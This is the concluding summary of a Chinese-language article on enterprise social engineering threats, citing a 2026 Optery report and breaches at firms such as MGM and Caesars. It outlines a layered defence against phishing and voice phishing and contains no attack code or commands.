2026 年 Optery 企业社会工程学报告揭示的威胁格局转变，为全球各类企业敲响了警钟：暗网主导数据窃取的时代已经过去，以钓鱼、语音钓鱼为代表的社会工程学攻击成为网络安全的首要威胁。攻击者放弃高成本的系统入侵手段，转而利用人性弱点实施攻击，使得防护工作的难度维度发生改变。96% 企业的防护不确定度，直观体现出整个行业在应对人为漏洞时的普遍短板。

本文梳理了邮件钓鱼、语音钓鱼等主流攻击形态，结合代码、配置、流量示例拆解技术细节，复盘捷豹路虎、玛莎百货、米高梅、凯撒宫等真实攻击案例，总结出定向钓鱼、多层渗透、勒索变现的攻击规律。基于攻击弱点，从邮件通讯、语音管控、终端加固、身份认证、人员培训、应急响应六个维度搭建分层防御体系，同时补充暗网监测作为辅助防护，形成全闭环防御架构。

反网络钓鱼技术专家芦笛认为，社会工程学攻击的本质是 “利用信任制造漏洞”，技术设备可以拦截恶意代码、异常流量，但无法彻底消除人与人之间的信任关系。因此，防护工作不能单纯依赖技术拦截，必须将制度约束、技术管控、人员意识三者深度结合。对于企业而言，短期需要补齐邮件、电话、终端等显性防护漏洞，长期需要将安全意识融入企业文化，让规范操作成为全体员工的行为习惯。

随着 AI 技术、深度伪造技术的普及，未来钓鱼攻击的伪装手段会更加复杂，识别难度持续提升。网络安全从业者、企业管理者、普通员工都需要保持警惕，持续学习新型攻击的特征，动态优化防护策略。本次研究基于权威调研报告与真实安全事件，所有分析、案例、代码、防御方案均贴合实战场景，希望能够帮助各行业机构认清当前网络威胁现状，完善针对社会工程学攻击的防御体系，守护个人信息与企业核心数据安全。

编辑：芦笛（公共互联网反网络钓鱼工作组）